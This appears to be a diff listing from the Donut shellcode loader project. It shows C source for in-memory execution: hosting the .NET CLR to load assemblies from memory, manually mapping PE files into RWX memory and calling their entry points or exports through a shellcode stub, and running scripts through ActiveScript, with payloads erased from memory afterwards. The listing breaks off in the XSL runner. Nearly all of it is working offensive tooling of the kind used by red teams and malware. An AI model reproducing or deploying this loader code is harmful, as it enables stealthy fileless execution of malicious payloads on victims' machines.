23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL LoadAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
32 PDONUT_MODULE mod;
33 HRESULT hr = S_OK;
34 BSTR domain;
35 SAFEARRAYBOUND sab;
36 SAFEARRAY *sa;
37 DWORD i;
38 BOOL loaded=FALSE, loadable;
39 PBYTE p;
40
41 if(inst->type == DONUT_INSTANCE_PIC) {
42 DPRINT("Using module embedded in instance");
43 mod = (PDONUT_MODULE)&inst->module.x;
44 } else {
45 DPRINT("Loading module from allocated memory");
46 mod = inst->module.p;
47 }
48
49 if(inst->api.CLRCreateInstance != NULL) {
50 DPRINT("CLRCreateInstance");
51
52 hr = inst->api.CLRCreateInstance(
53 (REFCLSID)&inst->xCLSID_CLRMetaHost,
54 (REFIID)&inst->xIID_ICLRMetaHost,
55 (LPVOID*)&pa->icmh);
56
57 if(SUCCEEDED(hr)) {
58 DPRINT("ICLRMetaHost::GetRuntime(\"%ws\")", mod->runtime);
59
60 hr = pa->icmh->lpVtbl->GetRuntime(
61 pa->icmh, mod->runtime,
62 (REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);
63
64 if(SUCCEEDED(hr)) {
65 DPRINT("ICLRRuntimeInfo::IsLoadable");
66 hr = pa->icri->lpVtbl->IsLoadable(pa->icri, &loadable);
67
68 if(SUCCEEDED(hr) && loadable) {
69 DPRINT("ICLRRuntimeInfo::GetInterface");
70
71 hr = pa->icri->lpVtbl->GetInterface(
72 pa->icri,
73 (REFCLSID)&inst->xCLSID_CorRuntimeHost,
74 (REFIID)&inst->xIID_ICorRuntimeHost,
75 (LPVOID)&pa->icrh);
76
77 DPRINT("HRESULT: %08lx", hr);
78 }
79 } else pa->icri = NULL;
80 } else pa->icmh = NULL;
81 }
82 if(FAILED(hr)) {
83 DPRINT("CorBindToRuntime");
84
85 hr = inst->api.CorBindToRuntime(
86 NULL, // load whatever's available
87 NULL, // load workstation build
88 &inst->xCLSID_CorRuntimeHost,
89 &inst->xIID_ICorRuntimeHost,
90 (LPVOID*)&pa->icrh);
91
92 DPRINT("HRESULT: %08lx", hr);
93 }
94
95 if(FAILED(hr)) {
96 pa->icrh = NULL;
97 return FALSE;
98 }
99 DPRINT("ICorRuntimeHost::Start");
100
101 hr = pa->icrh->lpVtbl->Start(pa->icrh);
102
103 if(SUCCEEDED(hr)) {
104 domain = inst->api.SysAllocString(mod->domain);
105
106 DPRINT("ICorRuntimeHost::CreateDomain(\"%ws\")", mod->domain);
107
108 hr = pa->icrh->lpVtbl->CreateDomain(
109 pa->icrh, domain, NULL, &pa->iu);
110
111 inst->api.SysFreeString(domain);
112
113 if(SUCCEEDED(hr)) {
114 DPRINT("IUnknown::QueryInterface");
115
116 hr = pa->iu->lpVtbl->QueryInterface(
117 pa->iu, (REFIID)&inst->xIID_AppDomain, (LPVOID)&pa->ad);
118
119 if(SUCCEEDED(hr)) {
120 sab.lLbound = 0;
121 sab.cElements = mod->len;
122 sa = inst->api.SafeArrayCreate(VT_UI1, 1, &sab);
123
124 if(sa != NULL) {
125 DPRINT("Copying %" PRIi64 " bytes of assembly to safe array", mod->len);
126
127 for(i=0, p=sa->pvData; i<mod->len; i++) {
128 p[i] = mod->data[i];
129 }
130
131 DPRINT("AppDomain::Load_3");
132
133 hr = pa->ad->lpVtbl->Load_3(
134 pa->ad, sa, &pa->as);
135
136 loaded = hr == S_OK;
137
138 DPRINT("HRESULT : %08lx", hr);
139
140 DPRINT("Erasing assembly from memory");
141
142 for(i=0, p=sa->pvData; i<mod->len; i++) {
143 p[i] = mod->data[i] = 0;
144 }
145
146 DPRINT("SafeArrayDestroy");
147 inst->api.SafeArrayDestroy(sa);
148 }
149 }
150 }
151 }
152 return loaded;
153 }
154
155 BOOL RunAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
156 SAFEARRAY *sav=NULL, *params=NULL;
157 VARIANT arg, ret, vtPsa, v1={0}, v2;
158 DWORD i;
159 PDONUT_MODULE mod;
160 HRESULT hr;
161 BSTR cls, method;
162 ULONG cnt;
163 OLECHAR str[1]={0};
164 LONG ucnt, lcnt;
165
166 if(inst->type == DONUT_INSTANCE_PIC) {
167 DPRINT("Using module embedded in instance");
168 mod = (PDONUT_MODULE)&inst->module.x;
169 } else {
170 DPRINT("Loading module from allocated memory");
171 mod = inst->module.p;
172 }
173
174 DPRINT("Type is %s",
175 mod->type == DONUT_MODULE_NET_DLL ? "DLL" : "EXE");
176
177 // if this is a program
178 if(mod->type == DONUT_MODULE_NET_EXE) {
179 // get the entrypoint
180 DPRINT("MethodInfo::EntryPoint");
181 hr = pa->as->lpVtbl->EntryPoint(pa->as, &pa->mi);
182
183 if(SUCCEEDED(hr)) {
184 // get the parameters for entrypoint
185 DPRINT("MethodInfo::GetParameters");
186 hr = pa->mi->lpVtbl->GetParameters(pa->mi, &params);
187
188 if(SUCCEEDED(hr)) {
189 DPRINT("SafeArrayGetLBound");
190 hr = inst->api.SafeArrayGetLBound(params, 1, &lcnt);
191
192 DPRINT("SafeArrayGetUBound");
193 hr = inst->api.SafeArrayGetUBound(params, 1, &ucnt);
194 cnt = ucnt - lcnt + 1;
195 DPRINT("Number of parameters for entrypoint : %i", cnt);
196
197 // does Main require string[] args?
198 if(cnt != 0) {
199 // create a 1 dimensional array for Main parameters
200 sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, 1);
201 // if user specified their own parameters, add to string array
202 if(mod->param_cnt != 0) {
203 // create 1 dimensional array for strings[] args
204 vtPsa.vt = (VT_ARRAY | VT_BSTR);
205 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, mod->param_cnt);
206
207 // add each string parameter
208 for(i=0; i<mod->param_cnt; i++) {
209 DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i + 1));
210
211 inst->api.SafeArrayPutElement(vtPsa.parray,
212 &i, inst->api.SysAllocString(mod->param[i]));
213 }
214 } else {
215 DPRINT("Adding empty string for invoke_3");
216 // add empty string to make it work
217 // create 1 dimensional array for strings[] args
218 vtPsa.vt = (VT_ARRAY | VT_BSTR);
219 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, 1);
220
221 i=0;
222 inst->api.SafeArrayPutElement(vtPsa.parray,
223 &i, inst->api.SysAllocString(str));
224 }
225 // add string array to list of parameters
226 i=0;
227 inst->api.SafeArrayPutElement(sav, &i, &vtPsa);
228 }
229 v1.vt = VT_NULL;
230 v1.plVal = NULL;
231
232 DPRINT("MethodInfo::Invoke_3()\n");
233
234 hr = pa->mi->lpVtbl->Invoke_3(pa->mi, v1, sav, &v2);
235
236 DPRINT("MethodInfo::Invoke_3 : %08lx : %s",
237 hr, SUCCEEDED(hr) ? "Success" : "Failed");
238
239 if(sav != NULL) {
240 inst->api.SafeArrayDestroy(vtPsa.parray);
241 inst->api.SafeArrayDestroy(sav);
242 }
243 }
244 } else pa->mi = NULL;
245 } else {
246 DPRINT("SysAllocString(\"%ws\")", mod->cls);
247 cls = inst->api.SysAllocString(mod->cls);
248 if(cls == NULL) return FALSE;
249
250 DPRINT("SysAllocString(\"%ws\")", mod->method);
251 method = inst->api.SysAllocString(mod->method);
252
253 if(method != NULL) {
254 DPRINT("Assembly::GetType_2");
255 hr = pa->as->lpVtbl->GetType_2(pa->as, cls, &pa->type);
256
257 if(SUCCEEDED(hr)) {
258 sav = NULL;
259 if(mod->param_cnt != 0) {
260 DPRINT("SafeArrayCreateVector(%li parameter(s))", mod->param_cnt);
261
262 sav = inst->api.SafeArrayCreateVector(
263 VT_VARIANT, 0, mod->param_cnt);
264
265 if(sav != NULL) {
266 for(i=0; i<mod->param_cnt; i++) {
267 DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i+1));
268
269 V_BSTR(&arg) = inst->api.SysAllocString(mod->param[i]);
270 V_VT(&arg) = VT_BSTR;
271
272 hr = inst->api.SafeArrayPutElement(sav, &i, &arg);
273
274 if(FAILED(hr)) {
275 DPRINT("SafeArrayPutElement failed.");
276 inst->api.SafeArrayDestroy(sav);
277 sav = NULL;
278 }
279 }
280 }
281 }
282 if(SUCCEEDED(hr)) {
283 DPRINT("Calling Type::InvokeMember_3");
284
285 hr = pa->type->lpVtbl->InvokeMember_3(
286 pa->type,
287 method, // name of method
288 BindingFlags_InvokeMethod |
289 BindingFlags_Static |
290 BindingFlags_Public,
291 NULL,
292 v1, // empty VARIANT
293 sav, // arguments to method
294 &ret); // return code from method
295
296 DPRINT("Type::InvokeMember_3 : %08lx : %s",
297 hr, SUCCEEDED(hr) ? "Success" : "Failed");
298
299 if(sav != NULL) {
300 inst->api.SafeArrayDestroy(sav);
301 }
302 }
303 }
304 inst->api.SysFreeString(method);
305 }
306 inst->api.SysFreeString(cls);
307 }
308 return TRUE;
309 }
310
311 VOID FreeAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
312
313 if(pa->type != NULL) {
314 DPRINT("Type::Release");
315 pa->type->lpVtbl->Release(pa->type);
316 pa->type = NULL;
317 }
318
319 if(pa->mi != NULL) {
320 DPRINT("MethodInfo::Release");
321 pa->mi->lpVtbl->Release(pa->mi);
322 pa->mi = NULL;
323 }
324
325 if(pa->as != NULL) {
326 DPRINT("Assembly::Release");
327 pa->as->lpVtbl->Release(pa->as);
328 pa->as = NULL;
329 }
330
331 if(pa->ad != NULL) {
332 DPRINT("AppDomain::Release");
333 pa->ad->lpVtbl->Release(pa->ad);
334 pa->ad = NULL;
335 }
336
337 if(pa->iu != NULL) {
338 DPRINT("IUnknown::Release");
339 pa->iu->lpVtbl->Release(pa->iu);
340 pa->iu = NULL;
341 }
342
343 if(pa->icrh != NULL) {
344 DPRINT("ICorRuntimeHost::Stop");
345 pa->icrh->lpVtbl->Stop(pa->icrh);
346
347 DPRINT("ICorRuntimeHost::Release");
348 pa->icrh->lpVtbl->Release(pa->icrh);
349 pa->icrh = NULL;
350 }
351
352 if(pa->icri != NULL) {
353 DPRINT("ICLRRuntimeInfo::Release");
354 pa->icri->lpVtbl->Release(pa->icri);
355 pa->icri = NULL;
356 }
357
358 if(pa->icmh != NULL) {
359 DPRINT("ICLRMetaHost::Release");
360 pa->icmh->lpVtbl->Release(pa->icmh);
361 pa->icmh = NULL;
362 }
363 }
+0
-249
payload/inmem_pe.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifdef _WIN64
32 #define IMAGE_REL_TYPE IMAGE_REL_BASED_DIR64
33 #else
34 #define IMAGE_REL_TYPE IMAGE_REL_BASED_HIGHLOW
35 #endif
36
37 typedef struct _IMAGE_RELOC {
38 WORD offset :12;
39 WORD type :4;
40 } IMAGE_RELOC, *PIMAGE_RELOC;
41
42 typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
43 typedef VOID (WINAPI *Start_t)(VOID);
44
45 typedef void (__cdecl *call_stub_t)(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
46
47 // same as strcmp
48 int xstrcmp(char *s1, char *s2) {
49 while(*s1 && (*s1==*s2))s1++,s2++;
50 return (int)*(unsigned char*)s1 - *(unsigned char*)s2;
51 }
52
53 // In-Memory execution of unmanaged DLL file. YMMV with EXE files requiring subsystem..
54 VOID RunPE(PDONUT_INSTANCE inst) {
55 PIMAGE_DOS_HEADER dos, doshost;
56 PIMAGE_NT_HEADERS nt, nthost;
57 PIMAGE_SECTION_HEADER sh;
58 PIMAGE_THUNK_DATA oft, ft;
59 PIMAGE_IMPORT_BY_NAME ibn;
60 PIMAGE_IMPORT_DESCRIPTOR imp;
61 PIMAGE_EXPORT_DIRECTORY exp;
62 PIMAGE_RELOC list;
63 PIMAGE_BASE_RELOCATION ibr;
64 DWORD rva;
65 PDWORD adr;
66 PDWORD sym;
67 PWORD ord;
68 PBYTE ofs;
69 PCHAR str, name;
70 HMODULE dll;
71 ULONG_PTR ptr;
72 DllMain_t DllMain; // DLL
73 Start_t Start; // EXE
74 call_stub_t CallApi; // DLL function
75 LPVOID cs = NULL, base, host;
76 DWORD i, cnt;
77 PDONUT_MODULE mod;
78 FARPROC api=NULL; // DLL export
79
80 // write shellcode to stack. msvc sux!!
81 #include "call_api_bin.h"
82
83 if(inst->type == DONUT_INSTANCE_PIC) {
84 DPRINT("Using module embedded in instance");
85 mod = (PDONUT_MODULE)&inst->module.x;
86 } else {
87 DPRINT("Loading module from allocated memory");
88 mod = inst->module.p;
89 }
90
91 base = mod->data;
92 dos = (PIMAGE_DOS_HEADER)base;
93 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
94
95 // before doing anything. check compatibility between exe/dll and host process.
96 host = inst->api.GetModuleHandle(NULL);
97 doshost = (PIMAGE_DOS_HEADER)host;
98 nthost = RVA2VA(PIMAGE_NT_HEADERS, host, doshost->e_lfanew);
99
100 if(nt->FileHeader.Machine != nthost->FileHeader.Machine) {
101 DPRINT("Host process and payload are not compatiable...cannot load.");
102 return;
103 }
104
105 DPRINT("Allocating %" PRIi32 " (0x%" PRIx32 ") bytes of RWX memory for file",
106 nt->OptionalHeader.SizeOfImage, nt->OptionalHeader.SizeOfImage);
107
108 cs = inst->api.VirtualAlloc(
109 NULL, nt->OptionalHeader.SizeOfImage + 4096,
110 MEM_COMMIT | MEM_RESERVE,
111 PAGE_EXECUTE_READWRITE);
112
113 if(cs == NULL) return;
114
115 DPRINT("Copying each section to RWX memory %p", cs);
116 sh = IMAGE_FIRST_SECTION(nt);
117
118 for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
119 Memcpy((PBYTE)cs + sh[i].VirtualAddress,
120 (PBYTE)base + sh[i].PointerToRawData,
121 sh[i].SizeOfRawData);
122 }
123
124 DPRINT("Processing the Import Table");
125 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
126 imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);
127
128 // For each DLL
129 for (;imp->Name!=0; imp++) {
130 name = RVA2VA(PCHAR, cs, imp->Name);
131
132 DPRINT("Loading %s", name);
133 dll = inst->api.LoadLibraryA(name);
134
135 // Resolve the API for this library
136 oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
137 ft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
138
139 // For each API
140 for (;; oft++, ft++) {
141 // No API left?
142 if (oft->u1.AddressOfData == 0) break;
143
144 PULONG_PTR func = (PULONG_PTR)&ft->u1.Function;
145
146 // Resolve by ordinal?
147 if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
148 *func = (ULONG_PTR)inst->api.GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
149 } else {
150 // Resolve by name
151 ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
152 *func = (ULONG_PTR)inst->api.GetProcAddress(dll, ibn->Name);
153 }
154 }
155 }
156
157 DPRINT("Applying Relocations");
158 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
159 ibr = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);
160 ofs = (PBYTE)cs - nt->OptionalHeader.ImageBase;
161
162 while(ibr->VirtualAddress != 0) {
163 list = (PIMAGE_RELOC)(ibr + 1);
164
165 while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
166 if(list->type == IMAGE_REL_TYPE) {
167 *(ULONG_PTR*)((PBYTE)cs + ibr->VirtualAddress + list->offset) += (ULONG_PTR)ofs;
168 } else if(list->type != IMAGE_REL_BASED_ABSOLUTE) {
169 DPRINT("ERROR: Unrecognized Relocation type %08lx.", (DWORD)list->type);
170 goto pe_cleanup;
171 }
172 list++;
173 }
174 ibr = (PIMAGE_BASE_RELOCATION)list;
175 }
176
177 if(mod->type == DONUT_MODULE_DLL) {
178 // call exported api?
179 if(mod->method[0] != 0) {
180 DPRINT("Resolving address of %s", (char*)mod->method);
181
182 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
183
184 if(rva != 0) {
185 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, cs, rva);
186 cnt = exp->NumberOfNames;
187
188 DPRINT("IMAGE_EXPORT_DIRECTORY.NumberOfNames : %i", cnt);
189
190 if(cnt != 0) {
191 adr = RVA2VA(PDWORD,cs, exp->AddressOfFunctions);
192 sym = RVA2VA(PDWORD,cs, exp->AddressOfNames);
193 ord = RVA2VA(PWORD, cs, exp->AddressOfNameOrdinals);
194
195 do {
196 str = RVA2VA(PCHAR, cs, sym[cnt-1]);
197 if(!xstrcmp(str, (char*)mod->method)) {
198 api = RVA2VA(FARPROC, cs, adr[ord[cnt-1]]);
199 break;
200 }
201 } while (--cnt);
202
203 if(api != NULL) {
204 CallApi = inst->api.VirtualAlloc(
205 NULL,
206 sizeof(CALL_API_BIN),
207 MEM_COMMIT | MEM_RESERVE,
208 PAGE_EXECUTE_READWRITE);
209
210 if(CallApi != NULL) {
211 DPRINT("Calling %s via code stub.", (char*)mod->method);
212 Memcpy((void*)CallApi, (void*)CALL_API_BIN, sizeof(CALL_API_BIN));
213 CallApi(api, mod->param_cnt, mod->param);
214 DPRINT("Erasing code stub");
215 Memset(CallApi, 0, sizeof(CALL_API_BIN));
216 inst->api.VirtualFree(CallApi, 0, MEM_DECOMMIT | MEM_RELEASE);
217 }
218 } else {
219 DPRINT("Unable to resolve API");
220 goto pe_cleanup;
221 }
222 }
223 }
224 } else {
225 DPRINT("Executing entrypoint of DLL\n\n");
226 DllMain = RVA2VA(DllMain_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
227 DllMain(host, DLL_PROCESS_ATTACH, NULL);
228 }
229 } else {
230 // The problem with executing EXE files:
231 // 1) They use subsystems either GUI or CUI
232 // 2) They call ExitProcess ...will need to review support of this later.
233 DPRINT("Executing entrypoint of EXE\n\n");
234 Start = RVA2VA(Start_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
235 Start();
236 }
237 pe_cleanup:
238 // if memory allocated
239 if(cs != NULL) {
240 // DPRINT("Erasing %" PRIi32 " bytes of memory at %p",
241 // nt->OptionalHeader.SizeOfImage, cs);
242 // erase from memory (disabled for now)
243 // Memset(cs, 0, nt->OptionalHeader.SizeOfImage);
244 // release
245 DPRINT("Releasing memory");
246 inst->api.VirtualFree(cs, 0, MEM_DECOMMIT | MEM_RELEASE);
247 }
248 }
+0
-156
payload/inmem_script.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 VOID RunScript(PDONUT_INSTANCE inst) {
32 HRESULT hr;
33 IActiveScriptParse *parser;
34 IActiveScript *engine;
35 MyIActiveScriptSite mas;
36 IActiveScriptSiteVtbl activescript_vtbl;
37 IHostVtbl wscript_vtbl;
38 PDONUT_MODULE mod;
39 PWCHAR script;
40 ULONG64 len;
41 BSTR obj;
42 BOOL disabled;
43
44 if(inst->type == DONUT_INSTANCE_PIC) {
45 DPRINT("Using module embedded in instance");
46 mod = (PDONUT_MODULE)&inst->module.x;
47 } else {
48 DPRINT("Loading module from allocated memory");
49 mod = inst->module.p;
50 }
51
52 // 1. Allocate memory for unicode format of script
53 script = (PWCHAR)inst->api.VirtualAlloc(
54 NULL,
55 (inst->mod_len + 1) * sizeof(WCHAR),
56 MEM_COMMIT | MEM_RESERVE,
57 PAGE_READWRITE);
58
59 // 2. Convert string to unicode.
60 if(script != NULL) {
61 // 2. Convert string to unicode.
62 inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
63 -1, script, mod->len * sizeof(WCHAR));
64
65 // we're using stack memory for the virtual function table
66 mas.site.lpVtbl = (IActiveScriptSiteVtbl*)&activescript_vtbl;
67 ActiveScript_New(inst, &mas.site);
68
69 mas.wscript.lpVtbl = (IHostVtbl*)&wscript_vtbl;
70 Host_New(inst, &mas.wscript);
71
72 mas.siteWnd.lpVtbl = NULL;
73
74 // 4. Initialize COM, MyIActiveScriptSite and event for OnLeaveScript method
75 DPRINT("CoInitializeEx");
76 hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
77
78 if(hr == S_OK) {
79 // 5. Instantiate the active script engine
80 DPRINT("CoCreateInstance(IID_IActiveScript)");
81
82 hr = inst->api.CoCreateInstance(
83 &inst->xCLSID_ScriptLanguage, 0,
84 CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
85 &inst->xIID_IActiveScript, (void **)&engine);
86
87 if(hr == S_OK) {
88 // 6. Get IActiveScriptParse object from engine
89 DPRINT("IActiveScript::QueryInterface(IActiveScriptParse)");
90
91 hr = engine->lpVtbl->QueryInterface(
92 engine,
93 #ifdef _WIN64
94 &inst->xIID_IActiveScriptParse64,
95 #else
96 &inst->xIID_IActiveScriptParse32,
97 #endif
98 (void **)&parser);
99
100 if(hr == S_OK) {
101 // 7. Initialize parser
102 DPRINT("IActiveScriptParse::InitNew");
103 hr = parser->lpVtbl->InitNew(parser);
104
105 if(hr == S_OK) {
106 // 8. Set custom script interface
107 DPRINT("IActiveScript::SetScriptSite");
108 mas.wscript.lpEngine = engine;
109
110 hr = engine->lpVtbl->SetScriptSite(
111 engine, (IActiveScriptSite *)&mas);
112
113 if(hr == S_OK) {
114 DPRINT("IActiveScript::AddNamedItem(\"%ws\")", inst->wscript);
115 obj = inst->api.SysAllocString(inst->wscript);
116 hr = engine->lpVtbl->AddNamedItem(engine, (LPCOLESTR)obj, SCRIPTITEM_ISVISIBLE);
117 inst->api.SysFreeString(obj);
118
119 if(hr == S_OK) {
120 // 9. Load script
121 DPRINT("IActiveScriptParse::ParseScriptText");
122 hr = parser->lpVtbl->ParseScriptText(
123 parser, (LPCOLESTR)script, NULL, NULL, NULL, 0, 0, 0, NULL, NULL);
124
125 if(hr == S_OK) {
126 // 10. Run script
127 DPRINT("IActiveScript::SetScriptState(SCRIPTSTATE_CONNECTED)");
128 hr = engine->lpVtbl->SetScriptState(
129 engine, SCRIPTSTATE_CONNECTED);
130
131 // SetScriptState blocks here
132 }
133 }
134 }
135 }
136 DPRINT("IActiveScriptParse::Release");
137 parser->lpVtbl->Release(parser);
138 }
139 DPRINT("IActiveScript::Close");
140 engine->lpVtbl->Close(engine);
141
142 DPRINT("IActiveScript::Release");
143 engine->lpVtbl->Release(engine);
144 }
145 }
146 DPRINT("Erasing script from memory");
147 Memset(script, 0, (inst->mod_len + 1) * sizeof(WCHAR));
148
149 DPRINT("VirtualFree(script)");
150 inst->api.VirtualFree(script, 0, MEM_RELEASE | MEM_DECOMMIT);
151 }
152 }
153
154 #include "activescript.c"
155 #include "wscript.c"
+0
-109
payload/inmem_xsl.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 VOID RunXSL(PDONUT_INSTANCE inst) {
32 IXMLDOMDocument *pDoc;
33 IXMLDOMNode *pNode;
34 HRESULT hr;
35 PWCHAR xsl_str;
36 VARIANT_BOOL loaded;
37 BSTR res;
38 PDONUT_MODULE mod;
39 ULONG64 len;
40 UCHAR c;
41
42 if(inst->type == DONUT_INSTANCE_PIC) {
43 DPRINT("Using module embedded in instance");
44 mod = (PDONUT_MODULE)&inst->module.x;
45 } else {
46 DPRINT("Loading module from allocated memory");
47 mod = inst->module.p;
48 }
49
50 // 1. Allocate RW memory for unicode format of script
51 xsl_str = (PWCHAR)inst->api.VirtualAlloc(
52 NULL,
53 (inst->mod_len + 1) * sizeof(WCHAR),
54 MEM_COMMIT | MEM_RESERVE,
55 PAGE_READWRITE);
56
57 if(xsl_str != NULL) {
58 // 2. Convert string to unicode.
59 inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
60 -1, xsl_str, mod->len * sizeof(WCHAR));
61
62 // 3. Initialize COM
63 DPRINT("CoInitializeEx");
64 hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
65
66 if(hr == S_OK) {
67 // 4. Instantiate XMLDOMDocument object
68 DPRINT("CoCreateInstance");
69 hr = inst->api.CoCreateInstance(
70 &inst->xCLSID_DOMDocument30,
71 NULL, CLSCTX_INPROC_SERVER,
72 &inst->xIID_IXMLDOMDocument,
73 (void**)&pDoc);
74
75 if(hr == S_OK) {
